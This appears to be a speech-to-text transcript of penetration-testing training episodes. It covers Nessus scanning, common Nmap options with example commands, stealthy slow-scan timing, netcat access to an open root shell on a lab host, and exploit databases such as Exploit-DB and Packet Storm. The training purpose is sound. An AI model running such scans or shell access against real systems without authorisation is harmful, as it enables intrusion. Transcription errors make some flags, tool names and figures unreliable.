All right, so once you do your host discovery and you find your host, so basically running a map scan would be sufficient for that, or Nessus has its own built-in. Let's go back. Let's go back to scan templates. For Nessus, we have a few vulnerability scans, which is actually a really cool and like kind of selling point for them right here. Even with its essentials, you'll notice that it has very modern, common threats and vulnerabilities that you can specifically scan for, like Solora Gates, Threat Landscape, Retrospective Proxy Logon, Print Nightmare. These are all relatively new. Active Directory Starter Scan. These are all relatively new vulnerabilities. So as you can see, Nessus is staying on top of that and saying, hey, these are common things you might want to scan for. But other than that, you might just want to run a basic network scan, right? You click on that. It takes you to this, you give it a name, give it a description, tell you where you want to save it, what your targets are going to be, and then, hey, if you need to do any of that scheduling goodness, that's going to be great. Notifications, like how do I know when it's done, things of that nature. Anything in discovery, so it's telling you like different settings in the scan type. I can change this to scan all ports, like common ports, so on and so forth. Let me show you, once this gets done, it has the ability to talk about what happens with the port, and the advanced functionality here that we can go into. We got different scan types, we can scan low bandwidth things, we do custom, so on and so forth. But I already want to scan because that saves us some time. We can go back to scans. We have a basic network scan here, and once it's done, you just hit scan and go. Once you fill out all the little dots and tills, right? And you hit scan, you let it done. You can see I've got one host. It found some vulnerabilities, gives me a nice visual to that. Let me know I've got like 8 critical, 6 high, which are usually the ones that we're looking for specifically out of the gate. I can go to this vulnerability list to see what those were, and I can see those right here. I've got one with a backdoor. You can click on that, so it gives me a description, the solution for this. So verified remote host has not been compromised, and reinstall system administrator. Maybe the system's been compromised, and that's why this is happening. And it even shows I was able to execute the ID command with the following request. And we can see that. And we see that it was on port 1524. It's got this weird wild shell thing. Okay, what does that look like? Let me jump into CompTIA here and see and do some verification. What is that? So let me see, netcat into NV192.1.2.1.134 on 1524, was it? Yeah, look at that. Iris just had this like random open root shell. That's not good. But the scanner found it for me, right? If I was scanning, I would want to definitely take that to my client and go, we've got like a severely big problem that we need to fix because that's no bueno. And we can see that's basically the same thing we see here with the output. So it was able to hook into that. So after that, we just kind of walk down this laundry list of things, doing some verification, working with these things, making sure that it wasn't false positives. And if they're not, now it's remediation time. It's time to wash all this garbage off because this is not good, right, for your clients. But it is why I hired us to find these vulnerabilities, learn more about them, give them that information, help them with mitigation so they can close these holes and make a more secure network.
All right, so what is the difference between a credentialed and a non-credentialed type scan?
Good question, Ronnie. And I'm glad you bring that up because sometimes, like we saw this scanner, it ran just fine. There's really nothing to it. But I've been given credentials by my clients. Well, then we can go past any kind of barrier that we would have to brute force. We can act as both external and internal threats if we have credentials. We just add the credentials to the scan. So we run back to the scan really quick, back to my scans. It's in the where you set things up. Where's my scans? Oh yeah, and there's a create new scan button. Not new folder. You can do it. There you go. In the new scan, we create that. We scroll over just a bit. Let's say we want to do this basic network scan again. Right here, you have credential tab. Bada bing. You tell it what type of thing this is going to be. The API, database, host, miscellaneous. I'm going to go to host, and then you can choose what type of credentials you want to put in there. So SSH or Windows credentials, and I can put that in, and then we can use those credentials in the scans to go. Okay, here's what I found from the outside. Now let's use credentials and act as an insider threat and see what we can see beyond the authentication wall. What can we get? So that's why credential scans are important for us. And I usually recommend people to do both, do non-credential and credential scans, so you can see on both sides of the aisle what is going to be vulnerable and where we can shore up the weaknesses.
All right, now the vulnerability scanning itself seems to be a relatively manual method, but I'm sure that there's actually ways we can automate. What are some tools that we can actually use to help us automate this?
Well, automation is always great, right? You don't ever, if you can't automate, it can just save you a bunch of time and effort. Obviously, with Nessus, we saw that automation was kind of built in through the GUI. You can just kind of set it and forget it on Peel style. But if you're talking more traditional automation where I'm writing scripts, any scanner that uses command line, right, command line options, you should be able to script that into a workflow that works for you and is most efficient and effective for you. Anything that has API capabilities, you can then hook an API using Python or whatever scripting language is available that they give. It's going to be in their documentation. I believe Nessus does. I think OpenBOS does as well. They will be able to do that. But think of other scanners like NICTU, right? It's a web application vulnerability scanner. That's what it does. What else off the top of my head? Any kind of directory fuzzing. You can do that. It's kind of a vulnerability scan. Skirting the edge on that. But and now obviously we have scripting capabilities with that as well. So anything that gives you the ability to create scripts, write scripts, hook into an API of some kind, that would be automation. And you would want to be looking for ways in which you could take advantage of that automation, make things fast and repeatable, and not forget anything because that does happen from time to time. You create these cool scripts, and then it's just fire and forgets, and you can customize them really quickly to your client's needs, and it's really nice.
All right, Daniel, thank you for actually walking us through this idea of vulnerability scanning. There's a lot of considerations to put in place as you are starting out your career as a pen tester. Make sure you take those into consideration as you use the different tools, as well as talk about Dan also talked about the idea of credential versus non-credential scans, and even the possibility of automation and what is available to you. All these are going to be great pieces of information for you as you continue on. Well, that will do it for our show today, but that means another great episode is coming your way, and we want you to be there with us. There's no doubt as
watching ITProTV.
That's right. A single word should actually bring tears to your... No, I'm joking. No, we're going to be talking about Nmap today. I'm here with Daniel Lowry as we get started. Now, Daniel, as far as the tool goes, this seems to kind of be one of the main ones to get started with. But before we jump in that, help us understand what Nmap does and why it's so effective.
Sure. So Nmap is short for network mapper, and it was created around circa late 90s, if I'm not mistaken, 97, 98-ish. I've been using it since almost then. I think 2000, 2001 was the first time I had my hands on Nmap and went, what does this thing do? And for years thought, this is completely useless. And then I realized that although I was using it correctly, I didn't know what to do with the information once it came back to me, right? That's where the disconnect came. Once you figure that out, you go, oh, Nmap, great tool, like the Nmap a lot. So what it does is it allows us to discover hosts and enumerate the services and the versioning, the operating system, and a myriad of other things that we might find interesting or useful as a penetration tester, someone who's looking to gain access into remote target systems. Nmap is going to be one of our go-to gold standard tools for finding out that information. Basically what it does is it shines a light in the darkness and finds the holes in the fence that we might find our way wiggling through into our target systems.
Now, the great thing I love about this particular tool is the command is fairly simple, Nmap, but there's like 900,000 different possible options and combinations.
It is a bit of a beast at this point. It has grown in size since its early days, and it can actually do some vulnerability scanning. It's got a lot of capabilities under the hood now, which is probably why it continues to hang on and continue to evolve. I say they, I mean the people at insecure.org who developed this lovely tool and make it what it is, and hearing back from the community and people building scripts for it. So it's gained a lot of functionality, but what we need to do today is take a look at some of those common arguments that we're going to use with it and see what do those things do and why are we interested and why are they so dang common.
All right, so let's go ahead and start with the list that you came up with, which begins with SS. So tell us about this.
All right, so this is the stealth scan. This is the default scan by Nmap. So I jump into a terminal, like we must do here, and we got this in front of us, and I type in Nmap, and I give it a target, right? So I'll say, I got a target on my network here, 4.3, and I fire that off. Well, the scan type that it is using by default is going to be that -SS, right? And capitalization doesn't matter here, and we'll take a look at that while that's scanning. I'm just almost done. You can see it did find some ports that were open on that. We have 80, 3000, 8080, 800, 8899, and it tells me what it expects those services to be. We'll a little more down that road here in just a moment. But what is that SS switch that we just did? What's happening? What does stealth scan mean? We just type in Nmap. Hello, there you go, keyboard, work with me. At the very top of this long, lengthy list of things that you can do, as Ronnie was talking about earlier here, you'll see scan techniques, very important part. And SS is the first one. We see that it is a SYN connect, TCP SYN scan, not connect scan, TCP SYN scan. So if you think of back to your TCP three-way handshake, right? What happens? You do a SYN, ACK, an ACK, and then you're done, right? SYN, ACK. There you go. That's a three-way handshake. Ronnie's on point. He knows that networking, by the way. I don't know if y'all know that. Ronnie's pretty smart at that stuff. So what have we done? Well, we've done basically just part of the connection instead of the full connection, right? And that way it speeds things up. Plus, since there was no full connection made, maybe that kind of thing isn't being tracked, isn't being logged. There's no real connection, so what's the purpose of making a log about it? Nothing really happened. For us, that's great because they call this the stealth scan. That's why they call it the stealth scan. Now, nowadays, that's not as common anymore. These things are, because we know that's how Nmap works, and that's kind of a big deal. People know about it, right? So there's going to be rules in place with most people's defenses to check and log for those types of scans. So it's not as stealthy as it once was. It's a little bit faster than some other types of scans, but you got to note that's the default. That's using that TCP SYN flag to make that connection, as well as that is that -S right here, capital S after that. Like I said, that capitalization counts here at this point. So keep that in mind.
All right, now right next to that though was also that S, that -S and the capital T. Let's go ahead and proceed on with that one.
Sure, basically, kind of same along the same lines as our stealth scanning, except it does make a full connection using the full TCP three-way handshake. So it's going to do a SYN, it's going to do a SYN ACK, and it's going to ACK back. And once everything's said and done, our RST flag will get set, and the connection will be done. Now we have some benefits to this because this is probably one of the more robust types of scans. It's because it did make a full three-way handshake to those ports. So what I mean by that is, with a stealth scan, we don't really fully complete the conversation. So we're making an assumption that that port is open or closed or whatever. Right? With a connect scan, a TCP connect scan, that -S capital T, as Ronnie so eloquently pointed out, is going to fully make a TCP connection with each port and verify whether or not it is actually open. So that's good. So it's a little nicer for us we're not assuming that the port is open. We know that with some pretty good assurance that port is actually open. So we like that scan. It's a little more noisy, right? It's a little more disruptive to the environment, but it does give us, and it'll take longer to run. That's always fine, right? But it does give us that assurance that we're looking for that those ports that we're looking at are actually open. At the end of the day, maybe we're running into some security controls where we might say, you know what, we need to do that full connect scan to verify that these aren't being manipulated in any kind of capacity. We're actually getting what we're looking for. So that's why you see both of them still around.
All right, what about the S and the U then?
SU. God help you if you've come this far. Because I will tell you right now, the SU option is only in the most dire of needs and consequences. I'm making a joke. You should run SU. SU, what that does is right here, you'll notice UDP scan. Yeah, UDP. And you're like, well, okay, so we got TCP, we got UDP. That seems pretty straightforward and normal. It takes a while to run an SU scan. And when I say a while, I mean for the standard set of ports that it looks for, you're probably looking at 20 minutes to an hour. Oh, yes. So a while, right? Even on virtual networks, I've taken 20 minutes to run an SU scan. So if you have the time, this is something that you want to fire off right out of the gates as you start your engagement, because it's going to be a hot minute, especially if you have multiple machines that you are scanning for UDP traffic. I tend to use this pointedly as I see necessary. Like if I don't see any real good information on a stealth or TCP type of scan, okay, I'm desperate. Let me throw an SU scan out there and see if that comes up with anything else. But you don't forget that that's there, right? Because it does help really string the way it works. I'll leave that to you, but ultimately at the end of the day, you just need to know that that's a UDP scan, that it does an -S capital U to fire it off, and it's kind of backwards in the way you would think of how these things work. I will highly recommend reading the manual for Nmap. I'm not saying manual, type man Nmap, and read through that with those common options. It's actually very detailed. Does a really good job. There's also a book available from Fyodor, the guy that created Nmap, with all the advanced techniques. You can even read some of those chapters for free at insecure.org or nmap.org. I think I have it there. Look in the documentation area. Great resource. So if you want to know about Nmap, those are great resources you should check out. I'll make sure I put the links in the show notes for you.
All right, now the scan techniques actually sound logical from a networking perspective, so that actually does make sense. The next one that you call out though is -PN. Now, it doesn't seem like a scan anymore in terms of the logical type of scan.
No, it is not, but it is used quite often. And actually, we've already used this one in a different episode, right? And I'm going to remind you of it right now. What -PN does is it says, hey, assume that my target is up. Do not perform a ping before you move on, right? Because in order of operations of Nmap, it goes, okay, you want me to scan a host? Cool. Let me verify that that host is actually up and do some name resolution as well. So it's doing some of this stuff. It's checking ARP. It's kind of doing some information gathering and verifications before it moves on to actual scanning. And that can slow things down. So we typically see a PN scan or PN argument thrown into your Nmap scan because it can speed things up, especially if you already know that that target is alive and running. So what purpose is it going to serve for me to verify that that is? There are purposes for doing that. But for the most part, I really don't feel the need for that. And only if I think I do would I want to leave this off. So let's take a look. It's right up here in our list of fun things to do. There you go, -PN, treat all hosts as online. So it just skips that host discovery phase and goes right to the scanning. Let's get right down to business, find some open ports. So that's why you see -PN. I use it almost every single scan I do. Every now and then I find a reason to leave that off, but for the most part, I know my target is up. I just need to scan it. I don't need to waste time with rediscovering the host. But notes there, I do a -PN and I'm off to the races to speed things up.
Now, our next one that you actually have listed here is kind of one that I find a little strange because it's actually more than 2 letters at this point. It's the T1 through 5. Is that?
Yes.
Okay.
These are the timing options. This is to make it go fast, we'll make it go slow. So very helpful for us. We want to push the gas a little bit harder, then we're going to go 4 and 5. So T4 and 5 is going to be fast, and then T3 is the default, the standard speed at which it will attempt to enumerate these ports and services. If you want to slow things down, then T's 1 and 2 are going to be your super sure. It's going to make it go very slow, but that can be helpful for us in certain instances where we're trying to fly under the radar a little bit. Right? We don't want to make a lot of noise. We want to act in more of that true red team threat adversarial emulation kind of thing going on, where we don't get popped by some seam or source system that's out there looking for intrusions. And go, oh, there they are. I see that scan. I see that scan. No, you crazy kook, trying to get that scan past me. So slowing things down can have it just kind of trickle past those defenses instead of the torrent that we would normally throw. If you're working in your environment, T5 it all the way, have a great time, make things go fast. But ultimately, if you need to slow things down, you need to be able to know what's going on there. There's a whole section for the T, the throttling capabilities, the timing options. Here's right here, timing performance. Options which take time are in seconds or append milliseconds. So they'll let you know what that is. And we can see right here, set timing template. Higher is faster. Right? You can see seconds are in S, minutes are M, H are hours, so on and so forth, as the values go. And then you got some parallelizations and rating. But definitely, like I said, check out man in map, and then look for timing. Let's see here, the next one, timing parameters are used. There you go. There you go. Timing performance. This section is where this weight and gold as far as like what in detail do all those things do? How does that work? And as you scroll down through, you start to see the parallelizations and things of that nature. And it even gives some different naming conventions: aggressive, insane, normal, and so on and so forth. All that stuff will show up in here. Let me just look at like insane. I think it's called insane. Yeah, there you go. Dash B: paranoid, sneaky, polite, normal, and aggressive, and insane. So there's your different timing types, and these are the dash D options that set those. So you have 0 through 5. I guess they say 1 through 5. Paranoid is 0, sneaky is 1, polite is 2, normal 3, aggressive 4, and insane 5. When you're ready to just beat the brakes off of it, get you some end up and done. You know what I'm saying? You know what I'm saying, Ronnie?
I do. I absolutely know. But yeah, when we start talking about this idea, there's actually more for us here. SV. Why do we need the V?
All right, this is you gotta have this one. This is if you're not using SV in your map stands, you're doing yourself a disservice. Because if we look, let me quit out here. Let's go back to where we actually ran the scan, and we see we had some ports, right? It also has this service column, and we have kind of looked at this before. So this should be like, oh yeah, I know where we're going with this because we talked about this just not too long ago. It's telling me what service it leaves is on that port, because some of these ports are very well known. 80 is ubiquitously known as being a register port for HTTP services. But is that what it is? Because I can change it as a site administrator. I can make anything I want. So what we like is that SV option, and what that will do is give me some versioning in there somewhere. I'm sure. We'll just do SV on it. Nmap-SV against 192.168.241.1.43. Fire off. Hopefully this doesn't take long. I should have done a -PN, so it doesn't do host discovery as it's doing right now because I left it off. So nice way to start chaining these things together, and you'll start to figure out what's a really good workflow for your Nmap scans. A lot of times I always put the -PN on there because I like that. Again, speed things up. Also, a lot of times don't do name resolution, which is -N. Again, starting to speed things up. Then you can throw some timing on there. You can see it's like, how much longer than that? Just hit any key. Oh, it's already done. But hit any key, it'll give you how long it takes before it should be done. Estimated time of completion. But here we go. We definitely got some interesting information back with that SV option because as you can see, we're seeing actual versioning information with that. So we're running Apache HTTPD versions 2429, 247, 2438, and again 247. Those are the different instances of Apache that are running on those different ports. So all of them are web services except for 3000. It was unsure because there was no banner or anything that returned, so it was unable to gather that information. So we'll have to use some manual information on that. But we did get a lot of really good versioning. Now we start looking for known exploits and vulnerabilities that are associated with Apache HTTPD versions 249, 247, 2438. You see what it says. So that's why if you're not doing this, you're doing yourself a disservice. All right, there's another one that we also call -O here. What does that do? -O starts to look for the operating system. What kind of operating system is running on your target, right? Now, let's see here. You can see that I didn't have anything here about operating systems. So how do I get that? -O comes to play. This time we will actually run some of those increased speeds things. So let's do nmap. I'll do sudo nmap, because I don't know if it means or not. -O, capital O, very important. It's not lowercase, so it's capital O. I'll do -T5 because it breaks off of it. -N for no name service lookup. -PN for no pinging that host and doing host discovery. And then 192.168.4.1.43. So this hopefully will go a little bit faster than what we just saw. And yeah, oh man, fast. That was, now I didn't do any of the versioning stuff there, so we got that off. But it was definitely much faster than what we saw before. But we do have right here running Linux 4. Something or 5. Something, and then it kind of gives its idea of what kind of kernel. So it looks like it thinks it's a does it say 64-bit kernel? No, it's just OS details. Linux 4.15. So that version of the kernel I think that's running. Right? It doesn't say whether or not it's a 64-bit or 32-bit architecture. Now. That said, a lot of times what you need to do is you'll see right here, OS detection was performed, but please submit this. It's not saying it now, but a lot of times it'll say it didn't find any closed ports, and therefore this is only best guess. So I always like to include a port I know is closed, so when I do OS detection, it gives the best possible answer on it because it uses that information to determine whether or not the OS is this version of Linux, that version of Windows, so on and so forth. Because they all kind of have their own ways of doing things. So there's the -O.
Now, there's one that actually is a word, though, as far as an option, which is the -dash script.
-dash scripts. We've seen -scripts. It's a great one. It runs script scans. What scripts are available? Plenty of them. Let's check them out. So if I ls/user share nmap scripts, booyah, lots. There are lots of different scripts. Lots of different scripts. Lots of different scripts, right? Tons of stuff in here. But if I want to invoke one of these scripts, I use the -dash script option. So let's say I want to do this, I don't know, who's IP NSE, right? Whatever. Sudo, because I like to run sudo nmap -dash script, and then you can't just do a space and whatever it is. I typically do equals, and then whatever it is. So this would be like who is, what was it, -IP.NSE. Like that, and then targets.com, whatever it is. Like, no, I guess that's not a real thing. Example.com or ITProTV. I'm not going to run it, but that would run that script against that targets. And I can choose any of those scripts that I want, but that's how you invoke those scripts. Again, you can leave this equal sign in, or you can take it out. Maybe it's a motto, however you like it.
All right. -A. What in the world is that?
That's one of my favies right there.
Okay.
Right. So it's kind of -A runs versioning,
okay,
OS detection, all sorts of lovely goodness, right? So let's get back to this thing here and clear the screen.
Is that like for all or something?
Yeah, it's let me clear. In map. And let's see here. There it is right there. Enable OS detection, versioning detection, script scanning, and trace routes. Yes, I like how you put it. It's like a catch-all because it does a lot of stuff. Especially that it's running script scanning. You're like, well, you have to say what script. Not necessarily. There's a default set of scripts that -A will look to and attempts to leverage against your targets. So -A, I like -A. My workflow typically is find all the open ports, focus in on those ports with a more in-depth scan by running a -A after that on only those things because you run a -A on all ports, whether open or closed, you're kind of doing all that at one time. It can be a bit of a bear. So look for all those open ports and then rescan with just those ports and the -A option. It'll make it a lot faster as well as only giving you the information you need.
All right, our final option here is going to be the -p.
Yes, this is the one we've been dancing around because as I just said, I only go after the ports that are open. Now, when I ran nmap, clear it out here. When I ran nmap against our target, let me speed that up, -T5, -N, and then I ran it against 192.168.241.143. It gave me some ports back, but I didn't tell it what ports to look for. They look for all. By default, nmap scans the top 1,000 ports. That doesn't mean ports 0 through 1,000. That means the most used 1,000 ports in service, and they keep an eye on that and they change it from time to time. But that's what's going to look for. The most commonly used 1,000 ports. But what are those ports I want? You know, if I want to tell it what port I want to look for. All right. Well, now that I've got a list of ports, maybe I want to do that -A scan, right? So what do? I do sudo nmap -A -T5 -N -P and then -P. This is where Ronnie's not breaking us to. What ports do I want to scan? Well, I want to do 80 and then comma separate values here. 3,000. What else we got? 880, 8800, and 8899. So now I have a list of ports I want. I can also do a range. If I want to do 8899 to 8999, I can do a -8999. So now I've got a range of ports. So I can specify a specific port or a range of ports using a -B option. Now here's a fun way. What if I want to scan all ports, every last port, which you should do, right? Check and see, because sometimes that regular standard 1,000 ports is great, but it doesn't get everything. So I can do a -P-, and that'll scan all 65,300 or 535 ports, right? Or you can just do 0 through 65535. Either of those ways will scan every port on the system. I like to do dash obviously because it's a whole lot easier. So you go to the dash option, very helpful for us to specify which port or port ranges we want to go after.
All right, well, remember that you're actually going to become very familiar with Nmap, if not by the end of this episode, not by the end of this episode, but by the end of this entire show. You will actually, of course, be using it on a daily basis as a pen tester, so make sure you get familiar with it. And these are the most common options that Daniel showed you. Well, that will wrap it up for us, but there's plenty more PenTest Plus to come, so make sure you stay tuned as we dive deep. A pen tester will have to That's right, welcome back to the conversation as I am joined by Mr. Daniel Lowry, and we are now going to be taking a look into the most common vulnerabilities and the idea of how we begin to exploit them. Now, it sounds fun, pen testing, the very initial idea of it, and then you start to realize something. I really don't know how to take advantage of a vulnerability that may exist. So, Daniel, you're going to help us out here, and where are we going to start?
Well, I guess we're going to take a look at two things today. Right? First off, why do vulnerabilities exist? Essentially, right? Maybe not get that far into the weeds, but we will talk about some of the common ways in which we find vulnerabilities as far as like, why does that occur? We're going to tackle that part. And then, okay, now that I know that there are vulnerabilities and exploits that are available to me in the wild somewhere on the internet, how do I get that? What are some resources I can go to try to find publicly available exploit code that I might use to my advantage in penetration test or otherwise? So that's hopefully going to give us a good look at this little topic of conversation, and that'll give you some resources to help you be able to do your job better.
All right, so where do, or why do they actually end up existing for us as we start talking about this?
Ultimately, Ron, it's going to come down to just a handful of factors here, but when we're talking about common application vulnerabilities, right? What are they? How they work? How they look? Why are these things happening? Like I said, it can boil down to just a handful of problems. Usually, some esoteric ways in which these happen, but in general, that's what I like to speak. In generalities, a few things. I'm just going to kind of whittle them out here real quick, and we'll kind of backtrack a little and talk about each one. Lack of error handling, lack of code signing, insecure data transmission, and trusting user input. That's my favorite right there. It gets you every time. Let's take it back to the beginning. The lack of error handling. Okay. So error handling is a very important thing to be able to do because here's what ends up happening. If I build an application and I say, Ronnie, here's my really cool application, I want you to play with it, test it out, see how you like it. I say, cool, do that. And it's maybe just kind of like a phone book database, right? Cool, real simple. It asks you what your name is, it asks you how old you are, it asks you where you were from, and then we store that in the database. Really neat. Excellent. So Ronnie's confronted with the application. It tells him, what is your name? Right? I said, Ronnie. It says, all right, cool. What is your date of birth? And he puts his date of birth in numerical format. And then where are you from? He puts the city he was born in. Excellent. He hits submit and everything's fine. Name. And then you give it back to me, or someone like me, or you, as the case may be, or into thinking outside the box. It says, what is your name? And I say, or 17963521415555674. What happens when I give it stuff it doesn't expect it to do? Right? Now, that should cause an error, right? This is not the expected data. Now, when you build programs, data types are very important. If it's expecting a specific data type and it does not receive that from the end user, then this is where things can go awry. And the worst case scenario will be it goes crash. I don't work no more. You start again and try, right? Okay, well, that sounds horrible. But why did that happen? Well, because I was expecting that weird data. I was expecting alphanumeric characters, right? Or I was expecting just alpha characters. Just give me, letters, either upper or lowercase, and I would have been good. But your name was O'Reilly, and therefore the O apostrophe Riley threw it off. It can't handle that. As a coder, did I expect for those things? Did I make sure that if you put that apostrophe in your name, that it would remove that out, or it would give you some sort of graceful handling of that? Oh, I've noticed you've given me a character that I can't process. Please try again. And maybe point to the character. So error handling, being able to error correctly. And then of course when an error does happen, does it fail open or does it fail closed? Right? So does it close the system down when it fails? Or does it just go, well, I don't know what to give you, so I can do everything, failing open. So proper error handling is definitely a cause of different types of vulnerability exploitation. Let's see here. What else we got?
We have the code signing. So I understand the idea of code signing, but how is that a vulnerability?
How's that? That's a great question. I like that question. Makes me think. How's that vulnerability? Well, because if I write code and it has malicious things happening in it, most people don't like reverse engineer other software. Right? Have to you don't have to reverse engineer. I don't either. You are probably in that same boat. You may never, but it's probably not a common stance, right? That being the case, things could be happening that you do not know about. And we understand this as a security community. Large organizations such as Microsoft and Apple have programs where if you want to develop applications that run on our platforms, you must prove that you are a worthy person by opting into the code signing process. Basically saying, I'm going to vouch for you as a programmer developing applications on our platform. And you get a signature, and that signature signs your code. So when I go to run it, the platform which it's running on goes, oh, he's got a signed code. He's known by the uppers, and I can trust his code. If not, it's going to go, somebody just kind of built this. Do you trust this at all? And then you have to go, well, yeah, I guess I trust it. And if you do, and it's bad, well, then there you go. You start to see the problem. So non-signed code can lead to vulnerabilities. People can copy it, people can change it, they can modify it, make something that looks very similar to what you've built, but has malicious intent underneath it and could compromise the system in some way, shape, or form. So code signing very important.
Yeah, the other one is the insecure data transmission. So this is just sending stuff unencrypted. Is that what we're talking about?
Insecure, yes, absolutely. Right? Things that are being sent or stored in your system in plain text, right? That might be of sensitive nature. So if we take our previous little database that we built that takes usernames, or people's names, dates of birth, and where they were born, and stores it, is it encrypting that data because where is it storing it? And when it takes it in, is it encrypting when it takes it in and it passes it on? Or is there any way that someone might intercept that in some sort of clear text fashion? Can I have access to the keys if it is being encrypted? Is that built in? Is the password built in? Are we hard coding credentials into things? We shouldn't be doing that because that's a mistake, right? Because if I can discover those things, then I can use them to my benefit as an attacker to gain access into said systems. And where else are you using the same types of credentials? Because password reuse never happens, right? Credential reuse never happens. Of course it doesn't. Being facetious. So we don't want to give our attackers keys to the kingdom by just making it all usable and readable and at their disposal. We want to do things to obfuscate, to encrypt, to hide, to make it difficult layers to jump over and jump through before they can actually ever even think about getting into that.
Now, when you talk about the idea of trusting the user input, are we really now talking about the developer of the application, trusting that they're doing things right, or is there something else here?
So yes, this definitely comes back to a developer issue. This is where secure coding practices is something I guess a lot of this is what we've been talking about as well, around some sort of secure SDLC, well, secure development or software development lifecycle, right? With trusting user input, this will get you into the weeds faster than just about anything. Think about our error handling, right? We trust that Ronnie's going to type a name into it, and that's going to be of a reasonable length. I don't know too many people who have names that are 2,000 characters long, right? Why would we allow for Ronnie to put in anything other than something that fits the idea of a name into an input field, and of course only giving him so much space in which to do it, right? Okay, you can only do 50 characters, you can only do 75 characters. That should cover the majority of people out there, and their names should probably fit inside of that 50 characters a lot. Because if I could feed more into it, maybe I get a buffer overflow situation, right? Because error is weird. Oh, I made it crash. That means it didn't know what to do with my weird information or too much information, and now I can exploit that, right? So trusting user input, you always want to validate what is being sent to me. Is it what I expect? If it's not, this error handled correctly. So you see how these things start to combine together to create good software that would be less likely to have some sort of vulnerability.
So I know it just popped in my mind something that used to happen in the early days of web pages. You go and put something into a form of some sort, and it would pop up this nice long error message for you, and it would have details of different things in there. That would probably be an example of the error handling. Is that just kind of spit out stuff that you're like, I don't know what that's about, but it looks like it could be important.
Yeah, absolutely. You're nailing the head. And of course, then the idea of error handling can also take you to what kind of information am I feeding back to my user? Is it sensitive, right? We want to make sure that what comes stack is useful for the people using it to help them troubleshoot the problem, but not too useful to help them basically reverse engineer the software and find further vulnerabilities. So there is some fine line. It is an art as much as it's a science to figure out how should we error handle, what does that look like correctly, what's too much information, what's not enough. You're gonna have to do some testing. It's not a one-size-fits-all solution, but the idea here is that you are doing it and not just I coded something, it's alive, give it to people, yay, things are happening. Oh no, vulnerabilities.
All right, so now Daniel, now that we actually understand that we're discovering those vulnerabilities out there, as a pen tester, how do I begin to take advantage of that to actually do the penetration test?
That's a really good question. I was hoping you know.
I'm assuming we're going to talk about resources.
Yes, we are. Look at Roddy, he's on point, man. You can't fool this guy at all. That's right. We got a few resources I'm going to hand you good folks today so that you can start going, oh, I didn't even know this was a thing. Maybe you do. Or maybe you learn a new one today. That'll be great. So I got a handful of them for us. Let's jump on the computer here and see what I got. First one on the hit list is the exploit database. Aptly named. Because guess what it contains? Exploits. You named it. Hey, man, Roddy, you're on point today, sir. You're absolutely right. It contains exploits. I will kind of get a little closer. You can start to see here are the most recently available exploits on the site. You can see the date there from when it was uploaded or installed into the system here. $bar ERP-CRM14.0.2 stored cross-site scripting vulnerability. And ooh, privilege escalation. That sounds fun. I like privilege escalation. You will too by the end of the series, I'm sure. We got macro expert 47 uncoded service path. That'll hose a Windows system without even thinking about it. That'll be fun. And then of course, if you want to know more about these things, you click on. So I'll click on this uncoded service path. It'll show you the vulnerability. A lot of times there's pretty good information on these things on what's going on here. You may need to know some scripting or programming to be able to work with these things. Sometimes they're purposely obfuscated or broken or specific to an environment. So you might have to do some modifications to these things. But some of them just work right out of the gate, and that's always a nice thing when that happens. But you can definitely look in here and start to see that there is a service called macro expert, and it has an uncoded service path, which could cause some serious vulnerabilities. I love this. There you go. Exploit. A successful attempt would require a local user to be able to insert their code into the system root path undetectably OS or security applications where it could potentially be executed during application startup or reboot if successful. The local user's code will execute with elevated privileges of the application. So always fun time there with those uncoded service paths. Let's see here. So that's just one. Exploit DB is probably the big dog on the block, honestly. If you've never used search exploit, we got my colleague box here. If I do search exploits for, what was it, dollar? How do you spell that? You can never Dalibar. I know there's two R's in there. Dalibar. Oh look, Dalibar seems to have problems in the past. This is a local copy of the exploit DB. So instead of being on offline, I've got an offline copy of the online service that is exploit DB. It's called searchsploit. So if you're running Kali, that's installed by default. So there you go. Last one, you can look it up by version and exactly what it is. It looks like a SQL injection there. Looks like it's starting a cross-site scripting, maybe cross-site cross forgery, SQL injection, remote code executions. Man, the hits just keep on coming for Dalibar. That's some real junk software. Yeah, I don't know. I've never used it, but it has quite a few vulnerabilities, or at least it has in the past. All right, so there's one. What else have we got on our hit list, Ronnie?
Vulners.
That's right. Vulners. I actually really like vulners. I don't even think this is. I think this is a Daniel Freedy here because I don't think it was in the list of the objectives. Thank you, sir. But I use this and it's been super helpful. Sometimes exploit DB will have things that vulners doesn't, and vice versa. So I like to use this kind of like a 1-2 punch. So notice I got this like a database area right here. Right, click on that, and that'll take you to wait for it, a database. That's right. I'll just look for something that we all know like eternal blue. And you start popping up. Bam. Oh, of course I gotta hit the go button, but whatever. Yes, I'm not robots. Oh, fill out the chimneys. Yeah, chimneys everywhere. Come on, there's one right there. Verify.
I love that.
Well, you can imagine. Don't show me this again. I don't care. There we go.
Yeah.
People spray things and things of that nature, right? So here we go. We got the CVE 2016, blah blah blah, so on. Denial service. You can click on these things just like you did before, and it shows you all the wonderful information about the CVS version 3, all the wonderful nomenclature that goes along with that. Very fun. And of course, what we're really looking for is that description, where we can find the code, is it available, can we download this, we use this, is it something we do in a browser, is it some sort of code we download and run, all that stuff will be in here. I'm just randomly clicking on things here, but you can search for what you're looking for, see if you can find some actual code or a methodology for performing the attack, follow the bouncing ball step by step, do the things it has to do, and hopefully at that point, as a penetration tester, not an attacker, you'll find yourself inside the system, exploiting it, and then have something right in your report to your customers. Right, what's next?
We have Packet Storm.
Packet Storm, you're right, Packet Storm. Been around a hot minute. They've been around a while. If you've never heard Packet Storm, you should get wise to this. They definitely have an area for exploits, right? These are recent files. I can see they've got a WordPress, info theme, cross-site scripting. Here's a online motorcycle bike rental system, 1.0 SQL injections, like that. Looks fun. And you can see this is actual code. It looks like Python. Yep, written Python. And I can just copy and paste this, or there's a download button. I don't know if there is. Yep, there it is right there. Download that, make the necessary modifications for my specific instance, and run set exploit code. So it's nice that Packet Storm also has a pretty good database of exploit code. You can look through our methods for exploiting certain different systems. So definitely check that out.
The next one is something that doesn't seem like it's actually going to be a penetration testing tool, but you have Google.
